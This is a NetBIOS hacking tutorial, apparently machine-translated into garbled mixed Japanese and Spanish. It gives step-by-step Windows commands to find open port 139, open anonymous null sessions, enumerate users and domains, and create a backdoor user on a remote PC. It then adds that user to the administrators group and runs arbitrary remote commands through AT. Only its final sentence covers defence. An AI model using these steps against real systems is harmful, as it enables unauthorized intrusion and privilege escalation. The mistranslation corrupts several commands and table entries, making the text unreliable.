NetBIOSによるハッキング
この Web サイトでは、NetBIOS を使用してリモート PC にできるだけ多くのデータを取得するさまざまな方法を示します.
まず最初に、接続したいコンピュータがNetBIOSポートを開いているか確認することです, ザ ポートは 139; これはMS-DOSのコンソールで次のコマンドを使って行うことができます: telnet IPアドレス 139 もし接続できれば開いていることになり、そうでなければ他のPCを探します.
次に重要なことは NetBiosテーブルを持っていることです, これは、リモートコンピュータで実行されているサービスを示し、後続のコマンドで得られた結果と照らし合わせて確認します
|
名前
|
サフィックス
|
やつ
|
サービス
|
| <コンピュータ名> |
00
|
又は
|
ワークステーションサービス |
| <コンピュータ名> |
01
|
又は
|
メッセンジャーサービス |
| <_MSBROWSE_> |
01
|
G
|
マスターブラウザ |
| <コンピュータ名> |
03
|
又は
|
メッセンジャーサービス |
| <コンピュータ名> |
06
|
又は
|
RASサーバーサービス |
| <コンピュータ名> |
1F
|
又は
|
NetDDEサービス |
| <コンピュータ名> |
20
|
又は
|
ファイルサーバーサービス |
| <コンピュータ名> |
21
|
又は
|
RASクライアントサービス |
| <コンピュータ名> |
22
|
又は
|
Exchangeインターチェンジ |
| <コンピュータ名> |
23
|
又は
|
Exchangeストア |
| <コンピュータ名> |
24
|
又は
|
Exchangeディレクトリ |
| <コンピュータ名> |
30
|
又は
|
モデム共有サーバーサービス |
| <コンピュータ名> |
31
|
又は
|
モデム共有クライアントサービス |
| <コンピュータ名> |
43
|
又は
|
SMSクライアントリモートコントロール |
| <コンピュータ名> |
44
|
又は
|
SMS管理者リモートコントロールツール |
| <コンピュータ名> |
45
|
又は
|
SMSクライアントリモートチャット |
| <コンピュータ名> |
46
|
又は
|
SMSクライアントリモート転送 |
| <コンピュータ名> |
4C
|
又は
|
DEC Pathworks TCPIP Service |
| <コンピュータ名> |
52
|
又は
|
DEC Pathworks TCPIP Service |
| <コンピュータ名> |
87
|
又は
|
Exchange MTA |
| <コンピュータ名> |
6宛先
|
又は
|
Exchange IMC |
| <コンピュータ名> |
BE
|
又は
|
Network Monitor Agent |
| <コンピュータ名> |
BF
|
又は
|
Network Monitor Apps |
| <ユーザー名> |
03
|
又は
|
メッセンジャーサービス |
| <ドメイン> |
00
|
G
|
ドメイン名 |
| <ドメイン> |
1B
|
又は
|
Domain Master Browser |
| <ドメイン> |
1C
|
G
|
ドメイン コントローラー |
| <ドメイン> |
1D
|
又は
|
マスターブラウザ |
| <ドメイン> |
1そして
|
G
|
Browser Service Elections |
| <INet~Services> |
1C
|
G
|
インターネット情報サーバ |
| <IS~Computer_name> |
00
|
又は
|
インターネット情報サーバ |
Con este comando de MSDOS podremos saber que servicios corre la maquina remota: nbtstat -A DIRECCIONIP 又は nbtstat -a NOMBREPC. Aparte de esto también nos dará la direccion マック por si nos interesase.
 Como podremos ver en la imagen hacemos un nbtstat a una IP o nombrePC y nos da esos resultados, que los comparamos con la tabla NetBIOS y sacaremos datos jugosos como su usuario, al dominio que pertenece… y si fuese un Controlador de Dominio veriamos los servicios que corre. |
Para establecer lo que se llama sesión nula, tenemos que ejecutar este comando: net use DIRECCIONIPIPC$ “”/又は:”” . Lo que realmente hace este comando es autenticarse en el PC remoto con el usuario anonimo.
Para autenticarnos en un equipo remoto con un usuario en concreto: net use DIRECCIONIP /u:USUARIO CONTRASEÑA 又は net use DIRECCIONIPC$ /u:USUARIO CONTRASEÑA 又は net use DIRECCIONIPRECURSO /u:USUARIO CONTRASEÑA… Una vez autenticados en el host remoto para ver el contenido de la carpeta se puede hacer net view DIRECCIONIP y veremos el contenido via MSDOS, pero tambien puedes hacer, INICIO > EJECUTAR y pones lo que quieras: DIRECCIONIP o DIRECCIONIPRECURSO y te mostrará con la ventana del explorador de Windows el contenido.
Ver la hora remota: net time DIRECCIONIP
Ver dominios disponibles: net view /domain
Ver equipos de un dominio concreto: net view /domain:ブハラ
Ver los usuarios de un equipo: net user
Ver los detalles de un usuario: net user nombreusuario
Crear un usuario: net user ユーザー名 パスワード /ADD (ATコマンドでリモートPCにユーザーを作成するのに最適)
ユーザーを削除する: net user ユーザー名 /DELETE
PCのグループを確認する: net group
ユーザーをグループに追加する: net group グループ名 ユーザー名 /ADD (リモートPCで作成したユーザーを管理者グループに追加するのに最適)
ユーザーをグループから削除する: net group グループ名 ユーザー名 /削除
命令 AT, リモートで作業を実行するため. コマンドで at IPアドレス そのPCでスケジュールされているタスクを確認でき、コマンドで at IPアドレス 21:30 /INTERACTIVE “リモートPCで実行するMS-DOSコマンド”. 前のコマンドで、値は 21:30 私がコマンドを実行するように設定した時間で、引用符の間にあるMS-DOSコマンドが実行される, したがって、任意の時間に設定できます, pero primero mira mejor que hora tiene!
La herramienta del Kit de Recursos de MS Windows nltest.rar muestra los controladores de dominio de un dominio en concreto, 例:
C:>nltest /dclist:bujarra.com
List pof DCS in Domain bujarra.com
bujarra01
Interesante sería el programa Nbtscan que lo que hace es un ‘nbtstat’ de toda una red a una velocidad impresionante.Ejemplo:
C:>nbtscan 192.168.0.0/24
 Doing NBT name scan for addresses from 192.168.0.0/24
 IP address  NetBIOS Server  Server  User  MAC address
 —————————————————————————–
 192.168.0.0  Sendto failed: Cannot assign requested address
 192.168.0.1  BUJARRA01 <サーバー> <不明>  00-e0-7d-78-11-e6
 192.168.0.13  MARIA <サーバー>  MARIA  00-e0-7d-76-5a-2b
 192.168.0.55  VICETOPC <サーバー>  VICETO 00-00-f8-30-fa-23
 192.168.0.100  Recvfrom failed: ピアによる接続のリセット
対して protegernos de este tipo de ataques debemos o cerrar el puerto 139 en el router, o habilitaremos el firewall en XP o quitaremos el servicio de compartir carpetas e impresoras para redes microsoft (en cualquier S.O. マイクロソフトの).
